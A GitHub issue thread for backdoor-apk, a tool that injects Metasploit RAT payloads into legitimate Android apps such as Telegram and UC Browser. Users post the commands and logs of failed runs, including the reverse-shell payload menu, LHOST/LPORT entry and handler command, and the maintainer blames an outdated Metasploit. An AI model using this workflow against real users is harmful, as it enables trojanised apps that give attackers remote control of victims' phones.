### ISSUE TITLE
Failed to copy RAT smali files

### ISSUE THREAD

**Issue by dytra** [dana-at-cp/backdoor-apk#57]
Hi I'm having problem using this tool.the original apk in the backdoor-apk directory
`cd /opt/backdoor-apk/backdoor-apk`
`./backdoor-apk.sh org.telegram.messenger_v3.15.0-8841_Android-4.0.apk`
Then it stops at `[!] Failed to copy RAT smali files`

[run.log](https://gist.github.com/dytra/045a37012b2ba6aea651f49120f40914)

**Comment by dana-at-cp** [comment]
@dytra Please share the original APK file.

**Comment by dana-at-cp** [comment]
@dytra I reviewed the run.log file and it appears that you are using an older version of Metasploit framework.

```
cp: cannot stat '/opt/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/MainService.smali': No such file or directory
```
Can you update Metasploit and see if the problem goes away?

**Comment by dana-at-cp** [comment]
@dytra I'm going to close this issue out. If you still have problems after updating Metasploit then create a new issue.

**Comment by Ehsan-Abbaspour** [comment]
Hi @dana-at-cp 
i have a problem in using this tool:
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[!] Failed to copy RAT smali files
 
in run.log file, i have this error :

mkdir: created directory ‘/root/apk-backdoor/backdoor-apk/backdoor-apk/original/smali/com/vpn01’
mkdir: created directory ‘/root/apk-backdoor/backdoor-apk/backdoor-apk/original/smali/com/vpn01/uniform’
cp: cannot stat ‘/root/apk-backdoor/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/MainBroadcastReceiver.smali’: No such file or directory
Forcing cleanup due to a failure or error state!

please help me,thanks!

**Comment by ijadmy97** [comment]
i have a same problem like Ehsan-Abbaspour 

Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[!] Failed to copy RAT smali files

in run.log

ProGuard, version 5.3.2
Reading program directory [/root/backdoor-apk/backdoor-apk/bin/classes]
Reading program directory [/root/backdoor-apk/backdoor-apk/libs]
Reading library jar [/root/backdoor-apk/backdoor-apk/third-party/android-sdk-linux/platforms/android-25/android.jar]
Preparing output jar [/root/backdoor-apk/backdoor-apk/bin/classes-processed.jar]
  Copying resources from program directory [/root/backdoor-apk/backdoor-apk/bin/classes]
  Copying resources from program directory [/root/backdoor-apk/backdoor-apk/libs]
I: Using Apktool 2.2.1-dirty on Rat.apk
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
payload_tld is: org
payload_primary_dir is: ws4
payload_sub_dir is: mailsite
mkdir: created directory ‘/root/backdoor-apk/backdoor-apk/original/smali/org/ws4’
mkdir: created directory ‘/root/backdoor-apk/backdoor-apk/original/smali/org/ws4/mailsite’
cp: cannot stat ‘/root/backdoor-apk/backdoor-apk/payload/smali/com/metasploit/stage/MainBroadcastReceiver.smali’: No such file or directory
Forcing cleanup due to a failure or error state!

please help me thnks!!

**Comment by ngabimos** [comment]
I have also the same problem

root@kali:~/Desktop/backdoor-apk-master/backdoor-apk# ./backdoor-apk.sh uc_browser.apk 
          ________
         / ______ \
         || _  _ ||
         ||| || |||          AAAAAA   PPPPPPP   KKK  KKK
         |||_||_|||         AAA  AAA  PPP  PPP  KKK KKK
         || _  _o|| (o)     AAA  AAA  PPP  PPP  KKKKKK
         ||| || |||         AAAAAAAA  PPPPPPPP  KKK KKK
         |||_||_|||         AAA  AAA  PPP       KKK  KKK
         ||______||         AAA  AAA  PPP       KKK  KKK
        /__________\
________|__________|__________________________________________
       /____________\
       |____________|            Dana James Traversie

[*] Running backdoor-apk.sh v0.2.2 on Tue Aug  1 18:19:58 EDT 2017
[+] Android payload options:
1) meterpreter/reverse_http   4) shell/reverse_http
2) meterpreter/reverse_https  5) shell/reverse_https
3) meterpreter/reverse_tcp    6) shell/reverse_tcp
[?] Please select an Android payload option: 3
[?] Please enter an LHOST value: 10.10.1.28                  
[?] Please enter an LPORT value: 4444
[+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
[*] Generating RAT APK file...done.
[*] Decompiling RAT APK file...done.
[*] Decompiling original APK file...done.
[*] Merging permissions of original and payload projects...done.
[*] Running proguard on RAT APK file...done.
[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[!] Failed to copy RAT smali files

run.log file and original apk file are attached in zipped folder called back.zip

[back.zip](https://github.com/dana-at-cp/backdoor-apk/files/1190954/back.zip)
